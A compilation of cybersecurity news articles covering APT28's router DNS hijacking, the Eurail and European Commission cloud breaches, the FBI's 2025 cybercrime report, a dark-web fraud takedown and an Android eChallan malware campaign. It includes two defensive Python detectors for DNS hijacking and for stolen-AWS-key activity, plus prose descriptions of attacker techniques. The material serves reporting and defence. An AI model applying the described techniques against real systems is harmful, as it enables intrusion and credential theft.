Beyond passive surveillance, Forest Blizzard has extended its SOHO router compromise operations to support adversary-in-the-middle (AiTM) attacks. These attacks specifically target Transport Layer Security (TLS) connections, enabling interception of sensitive communications.

In most cases, DNS traffic is transparently proxied, allowing users to connect to legitimate services without disruption. However, in select high-value scenarios, the attackers spoof DNS responses for targeted domains. This redirects victims to malicious infrastructure controlled by Forest Blizzard.

Once redirected, victims may encounter invalid TLS certificates mimicking legitimate services such as Outlook on the web. If users ignore certificate warnings, attackers can intercept plaintext data within the encrypted session. This may include emails and other sensitive cloud-hosted content.

Researchers observed two notable AiTM scenarios:
  • Attacks on Microsoft 365 domains, particularly Outlook on the web.  
  • Targeted operations against government servers in at least three African countries, where DNS interception enabled further data collection.  

Mitigation Strategies Against Forest Blizzard Threats 

To counter risks associated with SOHO router compromise, researchers recommend several defensive measures. For DNS protection, organizations should enforce domain-based access controls using Zero Trust DNS (ZTDNS), block malicious domains, and maintain detailed DNS logs to detect anomalies. Enabling network and web protection features in Microsoft Defender for Endpoint further strengthens defenses.

Equally critical is addressing identity security. Centralizing identity management, enforcing multifactor authentication (MFA), and applying Conditional Access policies can reduce the impact of credential theft from AiTM attacks. It is also advised to adopt passwordless solutions such as passkeys and restrict authentication to trusted devices and locations.

Eurail Confirms Security Breach Affecting Over 300,000 U.S. Individuals

Samiksha Jain, Firewall Daily – The Cyber Express

The Eurail data breach has exposed personal information of approximately 308,777 individuals in the United States, according to a disclosure by Eurail B.V., the Netherlands-based company that manages the official online sales platform for Eurail and Interrail rail passes. Among those affected are 242 residents of New Hampshire. The Eurail data breach occurred between late December 2025 and early January 2026, when an unauthorized actor gained access to Eurail’s network and transferred files. The company identified the issue after detecting unusual activity within its systems and later confirmed the exposure of personal data.

Eurail Data Breach Timeline and Response

Following the detection of suspicious activity, Eurail activated its incident response procedures and initiated an investigation with third-party cybersecurity experts. Law enforcement was also notified and is continuing to investigate the incident. According to the company, the unauthorized access took place on December 26, 2025, when files were transferred from its network. The investigation concluded that these files contained personal information, with the final determination made on February 25, 2026. Eurail began notifying affected individuals and state authorities on March 27, 2026, reporting the breach to attorneys general in California, New Hampshire, Oregon, and Vermont. A public notice was also issued on the European Youth Portal.

Information Compromised in the Eurail Data Breach

The company confirmed that the Eurail data breach involved sensitive personal information, including:
  • Names
  • Passport numbers
While this represents the confirmed data for U.S. individuals, earlier findings suggest that the broader impact may be more extensive. Previous disclosures linked to the incident indicated that additional data types were compromised, including financial and health-related information.

Broader Exposure Linked to Eurail Data Breach

Earlier this year, Eurail confirmed that data from a prior breach was being offered for sale on the dark web, with samples appearing on Telegram. This development suggested that the incident extended beyond initial containment and had evolved into a wider data exposure situation. The earlier dataset reportedly included passport details, bank account IBANs, email addresses, phone numbers, and health information, in addition to names. The combination of such data increases the risk of identity theft, financial fraud, and long-term misuse. The breach is also believed to have affected customers who purchased Eurail or Interrail passes through partner channels, as well as participants in the DiscoverEU program, which issued its own warning that sensitive personal details, including passport copies and financial information, may have been exposed.

Company Measures and Security Actions

In response to the Eurail data breach, the company has taken several steps, including terminating unauthorized access, strengthening internal security measures, and continuing its cooperation with law enforcement and cybersecurity experts. Eurail stated that it takes the protection of customer information seriously and is working to prevent similar incidents in the future. The investigation into the full scope of the breach is ongoing.

What Affected Individuals Should Do

Eurail has advised customers to stay alert to suspicious communications, especially any requests for personal information. Individuals are encouraged not to share sensitive data with unknown or unsolicited contacts claiming to represent the company. The company also recommends that users monitor their financial accounts and review credit reports regularly for any unauthorized activity. In the United States, consumers can obtain a free annual credit report from each of the three major credit bureaus. Those who suspect misuse of their information are advised to contact the Federal Trade Commission, reach out to their state’s attorney general office, and report the matter to local law enforcement.

A Growing Risk Around Travel Data

The Eurail data breach highlights the risks associated with large-scale travel platforms that handle sensitive identity and financial information. With passport numbers and other personal identifiers involved, the exposure can lead to long-term consequences for affected individuals. As investigations continue, the incident reinforces the need for stronger data protection measures and constant monitoring across systems that manage sensitive traveler information.

FBI Takes Down APT28 Network Behind Global DNS Hijacking Attacks

Ashish Khaitan, Firewall Daily – The Cyber Express

The Russian-linked threat group APT28 has continued to leverage vulnerable network devices to carry out large-scale DNS hijacking campaigns, enabling adversary-in-the-middle attacks. Recent developments show that these operations have drawn direct intervention from U.S. authorities.

The U.S. Department of Justice and the FBI announced a court-authorized operation to disrupt a network of compromised routers controlled by Russia’s military intelligence unit, widely known as APT28. According to findings aligned with prior reporting from the NCSC, the group has been exploiting routers to intercept communications, harvest credentials, and target individuals and organizations of intelligence interest.

DNS Hijacking and Adversary-in-the-Middle Tactics 

APT28’s operations include DNS hijacking, a technique that manipulates how domain names are resolved into IP addresses. By altering DNS settings, often at the router level, attackers redirect legitimate traffic through malicious infrastructure. This enables adversary-in-the-middle (AitM) attacks, where victims unknowingly connect to spoofed services. These malicious endpoints are designed to imitate legitimate platforms, allowing attackers to intercept login sessions and extract sensitive data, including passwords, OAuth tokens, and emails. Both the FBI and the NCSC have noted that these attacks can impact browser sessions and desktop applications alike, increasing the scale and effectiveness of credential harvesting.

U.S. Operation Targets APT28 Infrastructure 

The disruption effort, publicly disclosed by the Department of Justice, targeted a network of small office/home office (SOHO) routers compromised by APT28, also known as Fancy Bear, Sofacy, Sednit, STRONTIUM, Forest Blizzard, and Pawn Storm. The group is widely attributed to Russia’s GRU Unit 26165.

Since at least 2024, APT28 actors have exploited known vulnerabilities to gain access to thousands of TP-Link routers globally. After stealing credentials, they modified router configurations to redirect DNS traffic to malicious servers under their control. These operations were initially indiscriminate. However, the attackers implemented automated filtering mechanisms to identify DNS queries of intelligence value. For selected targets, the malicious DNS resolvers returned fraudulent records for domains, particularly those mimicking Microsoft Outlook services, to facilitate adversary-in-the-middle attacks against encrypted traffic.

Through this approach, APT28 was able to harvest unencrypted passwords, authentication tokens, emails, and other sensitive data from devices connected to compromised routers.

Official Statements on the Threat 

U.S. officials described the campaign as both persistent and dangerous. Assistant Attorney General John A. Eisenberg stated, “The GRU’s predatory use of networks in American homes and businesses for its malicious cyber operations remains a serious and persistent threat.”

U.S. Attorney David Metcalf added, “Russian military intelligence once again hijacked Americans’ hardware to commandeer critical data,” emphasizing that the government would continue to respond aggressively to nation-state cyber threats.

FBI officials also stressed the scale of the campaign. Assistant Director Brett Leatherman noted that compromised routers were used globally for espionage, while Special Agent Ted E. Docks highlighted that devices across more than 23 U.S. states had been weaponized.

How the FBI Disrupted the DNS Hijacking Network 

As part of the court-authorized operation, referred to as Operation Masquerade, the FBI deployed technical measures to neutralize the U.S. portion of APT28’s infrastructure. According to court documents, the FBI:
  • Sent commands to compromised routers to collect evidence of APT28 activity.
  • Reset DNS settings, removing malicious resolvers and restoring legitimate ISP configurations.
  • Blocked the actors’ ability to regain unauthorized access.
The operation was carefully tested on affected TP-Link devices to ensure that it did not disrupt normal functionality or collect user content. Importantly, the remediation steps can be reversed by users through factory resets or manual configuration changes. 

Continued Router Exploitation and Infrastructure Tactics 

These developments align closely with earlier findings from the NCSC, which documented how APT28 used Virtual Private Servers (VPSs) as malicious DNS infrastructure. Two main clusters were identified: 
  • Cluster One: Focused on modifying DHCP DNS settings in SOHO routers, enabling selective DNS hijacking and adversary-in-the-middle attacks.  
  • Cluster Two: Involved forwarding DNS traffic through a layered infrastructure, with some operations targeting high-value devices, including those in Ukraine.  
APT28’s activity has also included exploitation of vulnerabilities such as CVE-2023-50224 in TP-Link routers, allowing attackers to extract credentials and reconfigure DNS settings via crafted HTTP requests.

Targeted Services and Indicators 

APT28’s DNS hijacking campaigns have frequently targeted Microsoft Outlook-related domains, including: 
  • autodiscover-s.outlook[.]com  
  • imap-mail.outlook[.]com  
  • outlook.live[.]com  
  • outlook.office[.]com  
  • outlook.office365[.]com  
These targets reflect a clear focus on email-based intelligence gathering. Supporting infrastructure includes numerous malicious IP ranges and identifiable server configurations, such as unusual SSH ports and “dnsmasq-2.85” DNS services. 
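Both articles describe the same defender-visible pattern: a compromised router hands out an attacker-controlled resolver over DHCP, that resolver proxies most queries faithfully, and it spoofs only the Outlook names listed above. The checks below are an added example, not code from either article or from the FBI, NCSC or Microsoft; they run over constructed sample data (documentation and private address ranges, a hypothetical ISP allow-list), so the exact thresholds and address values are assumptions.

```python
"""Added example, not from either article: two defender-side checks for the
router-level DNS hijack pattern described above.  Check 1 compares the DNS
servers the router hands out via DHCP (option 6) with the ISP's resolvers and
the router's own LAN address.  Check 2 compares A records obtained through the
router's resolver with those from an out-of-band reference resolver; because
the campaign transparently proxies most queries and spoofs only selected
domains, a fully disjoint answer set for one of the targeted Outlook names is
the signature to look for.  All addresses below are constructed from
documentation ranges (RFC 5737) and private space.
"""
import ipaddress
from dataclasses import dataclass

# Outlook names the reporting lists as spoofing targets (defanged on the page).
WATCHED_DOMAINS = frozenset({
    "autodiscover-s.outlook.com",
    "imap-mail.outlook.com",
    "outlook.live.com",
    "outlook.office.com",
    "outlook.office365.com",
})


@dataclass(frozen=True)
class Finding:
    check: str      # "dhcp-resolver" or "spoofed-answer"
    subject: str    # resolver address or domain name
    severity: str   # "high" or "medium"
    detail: str


def unexpected_resolvers(advertised, allowed_networks):
    """Return one Finding per DHCP-advertised resolver outside the allow-list.

    `advertised` is the DNS server list from the client's DHCP lease;
    `allowed_networks` holds the ISP resolver ranges plus the router's LAN
    address, since home routers normally forward DNS themselves (often with
    dnsmasq, the same utility the campaign runs on compromised devices).
    """
    allowed = [ipaddress.ip_network(n, strict=False) for n in allowed_networks]
    findings = []
    for server in advertised:
        addr = ipaddress.ip_address(server)
        if not any(addr in net for net in allowed):
            findings.append(Finding(
                "dhcp-resolver", server, "high",
                "router advertises a DNS resolver outside the ISP/LAN allow-list"))
    return findings


def spoofed_answers(via_router, via_reference):
    """Compare per-domain A records from the router's resolver and a reference.

    Both arguments map domain -> list of IPv4 strings.  Any overlap between the
    two answer sets is treated as consistent, because CDN-fronted names rotate
    addresses legitimately; only a disjoint set is reported.  Targeted Outlook
    names get high severity, any other domain medium.  A medium finding on a
    CDN-fronted name is worth confirming (for example by comparing the TLS
    certificate chain served at each address) before treating it as hijacking.
    """
    findings = []
    for domain, reference in via_reference.items():
        answers = via_router.get(domain)
        if not answers or set(answers) & set(reference):
            continue  # no answer to compare, or at least one address agrees
        severity = "high" if domain in WATCHED_DOMAINS else "medium"
        findings.append(Finding(
            "spoofed-answer", domain, severity,
            f"router resolver returned {answers}, reference returned {reference}"))
    return findings


def run_checks(lease_dns, allowed_networks, via_router, via_reference):
    """Run both checks and return all findings, highest severity first."""
    findings = unexpected_resolvers(lease_dns, allowed_networks)
    findings += spoofed_answers(via_router, via_reference)
    return sorted(findings, key=lambda f: f.severity != "high")


if __name__ == "__main__":
    # Constructed sample: the router now advertises an unknown resolver, proxies
    # most lookups faithfully and spoofs one Outlook name plus one other domain.
    lease_dns = ["203.0.113.53", "192.168.1.1"]
    allowed = ["198.51.100.0/24", "192.168.1.1/32"]   # ISP resolvers + router
    via_reference = {
        "outlook.office365.com": ["198.51.100.10", "198.51.100.11"],
        "outlook.live.com": ["198.51.100.30"],
        "www.example.org": ["198.51.100.40"],
        "www.example.com": ["198.51.100.50"],
    }
    via_router = {
        "outlook.office365.com": ["203.0.113.7"],                # spoofed
        "outlook.live.com": ["198.51.100.31", "198.51.100.30"],  # overlaps: fine
        "www.example.org": ["203.0.113.40"],                     # differs, not targeted
        "www.example.com": ["198.51.100.50"],                    # proxied faithfully
    }
    for f in run_checks(lease_dns, allowed, via_router, via_reference):
        print(f"[{f.severity}] {f.check}: {f.subject} - {f.detail}")
```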

Mitigation and Security Recommendations 

Both the FBI and the NCSC recommend immediate steps to mitigate risks associated with DNS hijacking and adversary-in-the-middle attacks:
  • Replace end-of-life or unsupported routers
  • Update firmware to the latest available versions
  • Verify DNS settings to ensure they point to legitimate resolvers
  • Disable or secure remote management interfaces
  • Implement firewall rules to limit exposure
  • Enable multi-factor authentication (MFA) to reduce credential abuse
Users are also encouraged to monitor their networks and report suspected compromises to appropriate authorities.

$20 Billion Lost to Cybercrime as AI and Investment Scams Surge: FBI Report

Samiksha Jain, Firewall Daily – The Cyber Express

The FBI Internet Crime Report 2025 shows just how expensive cybercrime has become. In 2025, the FBI’s Internet Crime Complaint Center (IC3) received over one million complaints, with reported losses touching $20.8 billion, the highest ever recorded. That figure is not just a statistic. It reflects everyday incidents, individuals losing life savings to investment scams, businesses wiring money to fraudulent accounts, and organizations dealing with disruptions from ransomware attacks. What used to be isolated cases are now happening at scale.

The FBI Internet Crime Report 2025 also shows how the nature of cybercrime is changing. Fraud is no longer limited to suspicious emails or obvious scams. Criminals are using social platforms, messaging apps, and now even artificial intelligence to make their operations look legitimate. In many cases, victims don’t realize they are being targeted until the money is already gone.

At the same time, the report highlights that law enforcement is trying to keep pace. Operations targeting crypto scams and international fraud networks are making an impact, but the overall trend shows that cybercrime is expanding faster than it is being contained.

Cyber-Enabled Fraud Remains the Biggest Driver

A large share of these losses comes from cyber-enabled fraud, which alone accounts for nearly 85% of the total financial damage, or about $17.7 billion. Investment fraud continues to cause the most damage. In 2025, it led to $8.6 billion in losses, followed by business email compromise (BEC) and tech support scams. Within this, cryptocurrency investment fraud stands out. Losses linked to crypto scams reached $7.2 billion, making it the biggest single category.

[Figure: Cyber-Enabled Fraud. Image source: FBI Report]

These scams are no longer basic phishing attempts. Attackers spend time building trust, approaching victims through social media, messaging apps, or even dating platforms. Once trust is established, victims are guided toward fake investment platforms that show fabricated profits. By the time withdrawals are attempted, the money is gone.

AI-Enabled Scams Are Growing Fast

The FBI Internet Crime Report 2025 includes a separate section on AI-enabled scams for the first time, and the early numbers are already concerning.
  • More than 22,000 complaints linked to AI
  • Around $893 million in losses
AI is making scams more convincing. Fake profiles, cloned voices, and realistic conversations can now be created quickly and at scale. This allows attackers to run highly targeted campaigns without much effort. The challenge is that these scams often look legitimate, making it harder for individuals and even businesses to identify red flags in time.

Ransomware Continues to Target Critical Sectors

Ransomware remains a steady threat, especially for critical infrastructure.
  • Over 3,600 complaints reported in 2025
  • Losses crossed $32 million
The actual impact is likely much higher. Many organizations do not report full losses, especially indirect costs like downtime or recovery expenses. The report also notes 63 new ransomware variants identified during the year, showing how quickly these attacks continue to evolve. Sectors such as healthcare, manufacturing, and government facilities remain frequent targets, where even short disruptions can have serious consequences.

FBI Operations Are Preventing Some Losses

The report also highlights efforts by law enforcement to limit the damage. One example is Operation Level Up, focused on cryptocurrency investment scams. Since its launch in 2024, the initiative has helped reduce potential losses by more than $500 million. In many cases, victims did not realize they were being scammed until they were contacted. This reflects a larger issue: many cyber fraud cases go unnoticed until significant financial damage has already occurred.

Cybercrime Is Becoming More Structured

The report also points to broader trends. Cybercriminal groups are operating more like organized businesses. At the same time, state-linked actors are becoming more active, targeting infrastructure and sensitive data. One example highlighted is the DPRK IT worker scam, where individuals posing as remote IT workers gain access to company systems and use that access for data theft or further attacks. These developments show that cybercrime is no longer limited to isolated incidents. It is part of a larger, global ecosystem.

A Growing Gap Between Threats and Preparedness

The FBI Internet Crime Report 2025 shows a clear pattern—cybercrime is scaling faster than awareness and response.
  • Fraud tactics are becoming more personal and long-term
  • AI is helping attackers improve success rates
  • Cryptocurrency is making transactions harder to trace
While recovery efforts and law enforcement actions are improving, most interventions still happen after the damage is done.

Final Take on FBI Internet Crime Report 2025

The FBI Internet Crime Report 2025 highlights a shift in how cybercrime operates today. The scale—over $20 billion in losses—is significant, but the methods behind these numbers are just as important. From cyber-enabled fraud to AI-enabled scams and cryptocurrency investment fraud, attackers are using a mix of technology and human psychology to succeed. For individuals and organizations, the risk is no longer occasional—it is constant, and it is evolving.

A Compromised Tool Opened the Door to a 91GB European Commission Data Leak

Samiksha Jain, Firewall Daily – The Cyber Express

The European Commission cloud breach did not begin with a dramatic system hack or a visible outage. It started quietly, with a trusted tool, a routine update, and a single compromised credential. Within days, that was enough to expose nearly 91.7 GB of data and drag multiple EU entities into a widening cybersecurity incident. Disclosed publicly on March 27, the European Commission cloud breach is now being treated as a clear example of how supply-chain attacks are reshaping risk in cloud environments. Not because defenses were absent, but because the entry point looked legitimate.

European Commission Cloud Breach Traced to Compromised Trivy Tool

Investigators from CERT-EU say, with high confidence, that the European Commission cloud breach began with a supply-chain compromise involving Trivy, a widely used security scanning tool. The malicious version, attributed to a threat actor known as TeamPCP, was unknowingly used within the Commission’s environment after being delivered through standard update channels.

On March 19, the attacker obtained an AWS secret, an API key with management-level permissions. That single key became the gateway into the Commission’s cloud infrastructure.

From there, the activity was deliberate. The attacker attempted to uncover more credentials using TruffleHog, a tool designed to scan for secrets and validate access through AWS Security Token Service (STS). They also created a new access key tied to an existing user, an attempt to maintain access while avoiding detection. The European Commission cloud breach did not rely on breaking in. It relied on blending in.
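The two post-access steps just described (validating a stolen key through STS, then minting a new access key on an existing user) both leave CloudTrail records. The detector below is an added example, not code from the article or from CERT-EU; it assumes the STS validation appears as sts:GetCallerIdentity (the page does not name the API call), runs over constructed CloudTrail-style records, and uses hypothetical thresholds and baseline addresses.

```python
"""Added example, not from the article or from CERT-EU: a small detector for the
two post-compromise steps described above, run over constructed CloudTrail-style
records.  Assumption: the STS validation shows up as sts:GetCallerIdentity, the
usual no-privilege way to check whether a key works (the page only says the
attacker validated access through STS).  The detector flags a burst of
GetCallerIdentity calls from a source IP outside the baseline, and any
CreateAccessKey from a non-baseline IP, escalated when it follows such a burst.
Field names follow the CloudTrail record format; every value is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

BURST_THRESHOLD = 3                      # GetCallerIdentity calls ...
BURST_WINDOW = timedelta(minutes=5)      # ... within this window = a burst
FOLLOW_ON_WINDOW = timedelta(hours=1)    # CreateAccessKey this soon after a burst


@dataclass(frozen=True)
class Alert:
    rule: str
    source_ip: str
    event_time: datetime
    detail: str


def _event_time(raw):
    """CloudTrail eventTime is ISO 8601 in UTC with a trailing Z."""
    return datetime.strptime(raw, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _actor(event):
    ident = event.get("userIdentity", {})
    return ident.get("userName") or ident.get("arn", "unknown")


def detect(events, baseline_ips):
    """Return Alerts for the validation-burst and key-creation patterns.

    `baseline_ips` holds the source addresses the account normally sees
    (CI runners, offices); events from those addresses are not alerted on.
    """
    alerts = []
    validations = defaultdict(list)   # source IP -> recent GetCallerIdentity times
    burst_at = {}                     # source IP -> time its burst alert fired
    for ev in sorted(events, key=lambda e: _event_time(e["eventTime"])):
        ip = ev["sourceIPAddress"]
        if ip in baseline_ips:
            continue
        t = _event_time(ev["eventTime"])
        source, name = ev["eventSource"], ev["eventName"]
        if source == "sts.amazonaws.com" and name == "GetCallerIdentity":
            recent = [x for x in validations[ip] if t - x <= BURST_WINDOW] + [t]
            validations[ip] = recent
            if len(recent) >= BURST_THRESHOLD and ip not in burst_at:
                burst_at[ip] = t
                alerts.append(Alert(
                    "sts-validation-burst", ip, t,
                    f"{len(recent)} GetCallerIdentity calls within {BURST_WINDOW} "
                    f"as {_actor(ev)} from an IP not in the baseline"))
        elif source == "iam.amazonaws.com" and name == "CreateAccessKey":
            caller = _actor(ev)
            target = ev.get("requestParameters", {}).get("userName") or caller
            since = burst_at.get(ip)
            if since is not None and t - since <= FOLLOW_ON_WINDOW:
                rule = "access-key-after-validation"
                detail = (f"{caller} created an access key for {target} "
                          f"{t - since} after the validation burst")
            else:
                rule = "access-key-from-new-ip"
                detail = f"{caller} created an access key for {target}"
            alerts.append(Alert(rule, ip, t, detail))
    return alerts


# Constructed records: one routine check from a known CI address, then the intrusion.
SAMPLE_EVENTS = [
    {"eventTime": "2026-03-19T08:00:02Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "198.51.100.5",
     "userIdentity": {"type": "IAMUser", "userName": "ci-scanner"}},
    {"eventTime": "2026-03-19T10:01:05Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"type": "IAMUser", "userName": "ci-scanner"}},
    {"eventTime": "2026-03-19T10:01:41Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"type": "IAMUser", "userName": "ci-scanner"}},
    {"eventTime": "2026-03-19T10:02:40Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetCallerIdentity", "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"type": "IAMUser", "userName": "ci-scanner"}},
    {"eventTime": "2026-03-19T10:20:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateAccessKey", "sourceIPAddress": "203.0.113.77",
     "userIdentity": {"type": "IAMUser", "userName": "ci-scanner"},
     "requestParameters": {"userName": "ci-scanner"}},
]
BASELINE_IPS = {"198.51.100.5"}

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS, BASELINE_IPS):
        print(f"{a.event_time:%H:%M:%S} {a.rule} from {a.source_ip}: {a.detail}")
```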

Data Theft and Dark Web Leak

The impact became clearer days later. A large volume of data, around 91.7 GB compressed or roughly 340 GB uncompressed, was exfiltrated from the compromised AWS account. On March 28, the data extortion group ShinyHunters published the dataset on its dark web leak site. The group claimed it included “data dumps of mail servers, datavases [sic], confidential documents, contracts, and much more sensitive material”.

Early analysis confirms that the European Commission cloud breach exposed personal data, including names, usernames, and email addresses. The dataset also contains more than 51,000 files linked to outbound email communications. While most of these emails are automated notifications, some “bounce-back” messages may include original user-submitted content. That detail matters, as it raises the risk of unintended personal data exposure across systems that rely on user interaction.

Wider Impact Across EU Entities

The European Commission cloud breach goes beyond a single institution. The compromised AWS account is part of the infrastructure behind the “europa.eu” web hosting platform, which supports dozens of websites. Data linked to up to 71 clients may be affected: 42 internal European Commission services and at least 29 other Union entities. This shared infrastructure model is efficient, but it also means that one compromised component can have a broader footprint. Despite this, officials have confirmed that no websites were defaced, taken offline, or altered during the incident. There were no service disruptions. But the absence of visible damage should not be mistaken for limited impact.

Timeline Shows Speed of Supply-Chain Attacks

The timeline of the European Commission cloud breach highlights how quickly such incidents can unfold:
  • March 19: AWS credential obtained via compromised Trivy tool
  • March 24: Alerts triggered over unusual API activity and traffic spikes
  • March 25: CERT-EU notified; access secured and keys revoked
  • March 27: Public disclosure by the European Commission
  • March 28: Data published by ShinyHunters
In less than ten days, the attack moved from initial access to public data exposure.

Response and Containment Efforts

The European Commission acted quickly once the breach was identified. The compromised AWS secret was secured, newly created access keys were disabled, and all known exposed credentials were deactivated or deleted. Authorities also followed regulatory protocol, informing data protection bodies, including the European Data Protection Supervisor (EDPS), and notifying impacted entities. Direct communication with affected clients began on March 31. Importantly, the Commission has stated that its internal systems were not affected. However, the European Commission cloud breach remains under active investigation, particularly as analysis of the exposed databases continues.

A Familiar Weakness, Repeating

If the European Commission cloud breach feels familiar, it’s because the pattern is becoming more common. Attackers are no longer forcing their way in; they are entering through trusted software, CI/CD pipelines, and third-party tools. The compromised Trivy version was not flagged as malicious during installation. It behaved as expected until it didn’t. This is the real shift. Security teams are being asked to defend not just their infrastructure, but every dependency connected to it.

What This Breach Really Signals

The European Commission cloud breach is not just about one incident or one tool. It reflects a deeper issue: the growing difficulty of verifying trust in modern software ecosystems. Cloud environments, automation pipelines, and open-source tools have made operations faster and more efficient. But they have also introduced new blind spots. The lesson here is uncomfortable but clear—security controls worked, but they worked late. Detection came after access had already been established and data had already moved. And that is where the real risk lies.

One Operator, 373,000 Dark Web Sites, and a Criminal Business Built on Selling Nothing

23 March 2026, 06:08


A 35-year-old man operating from China ran the largest fraudulent dark web network ever dismantled, and the most disturbing detail is not the scale of the infrastructure he built, but what he was selling: child sexual abuse material that did not exist, to thousands of buyers who paid for it anyway.

On March 9, a global operation led by German authorities and supported by Europol was launched against one of the largest networks of fraudulent platforms in the dark web. The investigation began in mid-2021 against the dark web platform "Alice with Violence CP." During the investigation, authorities discovered that the platform's operator ran more than 373,000 fraudulent websites advertising child sexual abuse material and cybercrime-as-a-service offerings.

The first phase of Operation Alice ran for 10 days, with 23 countries joining forces. The participating nations included Spain, Germany, the United States, the United Kingdom, Ukraine, Mexico, Canada, and Australia. Europol facilitated intelligence exchange, provided analytical support, coordinated the international response, and played a critical role in tracing cryptocurrency payments across jurisdictions.

The criminal model this operator constructed sits at an unusual intersection of two distinct threats that security teams rarely analyze together. From February 2020 to July 2025, the suspect advertised child sexual abuse material on different platforms accessible through more than 90,000 of those onion domains. The perpetrator offered material in purchasable packages after buyers provided an email address and made a payment in Bitcoin, with each package costing between €17 and €215 and promising data volumes ranging from a few gigabytes to several terabytes.

The material was never delivered. Customers were tricked into providing payment for these products but received nothing in return. Europol estimated the suspect made around €345,000 — approximately $400,000 — from around 10,000 people who attempted to buy the illicit material.

Not Just Any Other Dark Web Economy

The fraud architecture layered two criminal economies on top of each other. Alongside child abuse material, the platform also offered cybercrime-as-a-service listings — including stolen credit card data and access to compromised backend computer systems — extending the operator's reach from child exploitation into enterprise-grade cybercrime services.

The CaaS dimension means the operator's customer base included not only individuals seeking abuse material but also cybercriminals seeking ready-made access to corporate networks, broadening the downstream harm considerably.

The infrastructure scale alone places this case in a different category from any previous dark web takedown. The dark web runs on onion domains — a special type of website address engineered specifically to conceal the identity and location of both the operator and visitors by routing traffic through layered encryption relays.

Over nearly five years of investigation, German authorities discovered that a single individual operated over 373,000 onion domains on the dark web. Managing that volume of infrastructure requires automation, deliberate operational security planning, and sustained technical capability.

Operation Alice initially only targeted the platform operator. However, through international cooperation, the investigation uncovered the identities of 440 customers who had used the operator's services. Due to the nature of the purchases, additional investigations were launched against them, and the operation remains ongoing against more than 100 of those individuals.

The operational results include the seizure of 105 servers along with computers, mobile phones, and electronic storage devices. Investigators also seized the financial proceeds generated across five years of operation.


The Cyber Express Weekly Roundup: Cyberattacks, AI Risks, and Geopolitical Cyber Threats

20 March 2026, 08:44

In this week’s cybersecurity roundup, The Cyber Express covers key global security developments, including a major supply chain disruption affecting a global manufacturer, rising concerns over security and legal risks linked to rapid AI adoption, and the continued escalation of cyber activity driven by geopolitical tensions.

Across industries, organizations are facing a mix of disruptive attacks and long-term espionage campaigns targeting both operational systems and critical infrastructure. Intelligence reports also continue to highlight sustained nation-state activity shaping the global threat landscape.

These developments reflect a cybersecurity environment where operational resilience, secure technology adoption, and coordinated defense strategies are increasingly essential to managing interconnected and fast-evolving risks.

The Cyber Express Weekly Roundup

Stryker Cyberattack Disrupts Supply Chain, Recovery Timeline Unclear

A cyberattack on Stryker Corporation has disrupted manufacturing, shipping, and order processing operations, with no clear recovery timeline announced. While internal systems were impacted, customer products have not been affected. The incident has been linked to the Handala group, and authorities, including the Cybersecurity and Infrastructure Security Agency (CISA), are currently investigating the attack.

AI Legal Risks Rise as Businesses Rush Adoption, Expert Warns

Cybersecurity expert Lisa Fitzgerald has warned that rapid adoption of AI tools without proper governance can expose organizations to data breaches, regulatory violations, and loss of control over sensitive information. In an interview with The Cyber Express, she emphasized the importance of structured risk assessments, employee training, and clear governance frameworks to manage AI-related risks effectively.

Bonnie Butlin Highlights Role of Collaboration in Modern Security

Bonnie Butlin has stressed the importance of global collaboration in addressing complex cyber, physical, and geopolitical threats. She highlighted the need to break down industry silos, strengthen cross-sector cooperation, and build more inclusive leadership models to improve resilience against evolving risks.

US Intel Warns China Is Top Cyber Threat Ahead of Other Nation-States

A new U.S. intelligence assessment identifies China as the most persistent cyber threat actor, with ongoing operations reportedly embedded within critical infrastructure systems. The report also highlights cyber activities from Russia, North Korea, and Iran, each employing different tactics ranging from espionage and sabotage to cybercrime and disinformation campaigns.

Middle East Cyber Warfare Intensifies Amid Rising Geopolitical Conflict

According to Cyble Research and Intelligence Labs, cyberattacks in the Middle East are increasing in parallel with ongoing geopolitical tensions. Critical sectors such as energy, finance, and communications have been identified as primary targets in this escalating cyber conflict landscape.


Weekly Takeaway

This week’s The Cyber Express weekly roundup highlights the growing complexity of the global cybersecurity environment, from supply chain disruptions and AI governance risks to escalating nation-state cyber operations and regional cyber warfare. Organizations, governments, and individuals must remain vigilant, prioritize strong governance frameworks, and adopt proactive security measures, including timely patching and continuous monitoring, to respond effectively to the evolving threat landscape.
Android Malware Campaign Targets Indian Users via Fake eChallan Alerts

By Ashish Khaitan, 20 March 2026, 04:53

A new Android malware campaign targeting Indian users has been reported by the Indian Computer Emergency Response Team (CERT-In). According to the agency, multiple reports indicate a coordinated effort by cybercriminals to steal sensitive financial and personal data through deceptive mobile applications and phishing techniques.

The ongoing Android malware campaign revolves around fraudulent messages posing as official eChallan or RTO Challan alerts. Victims typically receive SMS notifications claiming that a traffic violation has been recorded against their vehicle. These messages often include alarming language, such as legal threats or additional penalties, urging immediate action.

Android Malware Campaign Exploits eChallan and RTO Challan Trust

A common message reads: “Your vehicle challan has been generated. Download the receipt from the link below.” The link or attachment leads users to download malicious APK files named “RTO Challan.apk,” “RTO E Challan.apk,” or even “MParivahan.apk.”

As highlighted by CERT-In, these files act as entry points for a multi-stage malware infection. Once installed, the application appears in the app drawer, giving the illusion of legitimacy. However, it is only a dropper component. The actual malicious payload is deployed when users tap on prompts such as “Install Update.”

Multi-Stage Malware and Device Compromise

Once activated, the malware keeps the eChallan theme but hides from the user by not appearing in the app list. At this stage, it aggressively requests sensitive permissions, including access to SMS messages, phone calls, and background activity. This level of access allows attackers to maintain persistence on the device without detection. In some cases, the malware also requests permission to establish a VPN connection, enabling threat actors to monitor and intercept the device’s internet traffic.

The ultimate goal of this Android malware campaign is financial theft. Fake interfaces resembling legitimate RTO Challan or banking pages are displayed to trick users into entering sensitive information such as card details and login credentials.
